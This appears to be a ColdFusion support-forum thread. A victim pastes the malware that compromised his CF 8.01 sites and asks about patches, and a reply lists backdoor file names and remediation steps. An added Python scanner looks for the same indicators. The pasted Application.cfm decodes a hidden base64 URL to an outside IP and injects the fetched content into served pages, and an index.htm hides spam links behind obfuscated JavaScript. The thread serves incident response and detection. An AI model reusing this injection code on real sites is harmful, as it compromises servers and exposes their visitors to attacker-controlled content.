CF8.01 hacked.  Need info on patches

Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative security patch that we can apply or if I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.
Here's the hack:
Application.cfm
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<cffunction name="hSWaawe"> 
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>
Index.htm
<html>
  <head>
    <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">
  </head>
  <body>
    <br>
    <br>
    <br>
    <br>
    <center>
      <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','99779188 90','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>
<p class="zdroq">
Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>
    </center>
  </body>
</html>
Thanks in advance.
--Jeremy

Those that have already applied the latest patch on CF9/10 but have been hacked: do you have a file /CFIDE/h.cfm, /CFIDE/i.cfm or /CFIDE/help.cfm? It is possible you had already been hit before applying the patch and still had a backdoor on your server. Note the file could be pretty much anywhere, but under /CFIDE somewhere is a likely location.
It is also possible that you have common third party software with a vulnerability that was hit, among many other things. It would be a good idea to review the web server logs around the time of the incident to see if you can uncover anything.
If you find something that appears to be a new exploit you should send it to the Adobe Product Security Incident Response Team rather than posting it here: http://www.adobe.com/support/security/alertus.html
In addition to applying patches you should also follow the ColdFusion Lockdown Guides:
http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf
http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion-enterprise/pdf/CF10%20Lockdown%20Guide.pdf
Pete Freitag,
HackMyCF.com
Foundeo Inc.
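
A defensive sweep for the indicators mentioned in this thread, as an added example that is not part of either post: it flags the file names Pete lists under /CFIDE, templates carrying the "Archivver" agent string, and base64 literals that decode to URLs in templates combining CFHTTP with ToBinary. The function names, the sample webroot and the example.invalid URL are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Indicators taken from the thread; everything else here is illustrative.
BACKDOOR_NAMES = {"h.cfm", "i.cfm", "help.cfm"}  # file names listed for /CFIDE
INJECT_UA = "archivver"                          # userAgent set by the injected code
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")


def decode_literals(text):
    """Decode quoted base64-looking literals that turn out to be plain ASCII."""
    decoded = []
    for m in B64_LITERAL.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore
    return decoded


def scan_webroot(root):
    """Return (relative path, finding, detail) tuples for templates needing review."""
    root, findings = Path(root), []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in {".cfm", ".cfc"}:
            continue
        rel = path.relative_to(root)
        parts = [p.lower() for p in rel.parts]
        # A listed name anywhere below a CFIDE directory is a lead, not proof.
        if "cfide" in parts[:-1] and parts[-1] in BACKDOOR_NAMES:
            findings.append((rel.as_posix(), "backdoor-name", parts[-1]))
        text = path.read_text(errors="replace")
        lowered = text.lower()
        if INJECT_UA in lowered:
            findings.append((rel.as_posix(), "injected-user-agent", INJECT_UA))
        # The injected template hides its fetch URL behind ToString(ToBinary(...)).
        if "<cfhttp" in lowered and "tobinary(" in lowered:
            for value in decode_literals(text):
                if value.lower().startswith(("http://", "https://")):
                    findings.append((rel.as_posix(), "encoded-url", value))
    return findings


def build_sample(root):
    """Write a constructed webroot: one injected file, one listed name, one clean file."""
    root = Path(root)
    url = "http://payload.example.invalid/inject.txt"  # constructed placeholder
    blob = base64.b64encode(url.encode()).decode()
    (root / "site1").mkdir()
    (root / "CFIDE" / "scripts").mkdir(parents=True)
    (root / "site1" / "Application.cfm").write_text(
        '<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)>\n'
        f'<CFHTTP METHOD="Get" URL="#dec(\'{blob}\')#">\n</cfif>\n'
        '<cffunction name="dec"><cfargument name="s">\n'
        '<cfreturn ToString(ToBinary(s))></cffunction>\n')
    (root / "CFIDE" / "scripts" / "h.cfm").write_text("<cfoutput>ok</cfoutput>\n")
    (root / "site1" / "index.cfm").write_text("<cfoutput>#now()#</cfoutput>\n")
    return url


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan_webroot(tmp), sep="\n")
```

The same "Archivver" string is worth searching for in the web server access logs, since the injected Application.cfm requests each page from the server itself with that agent.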
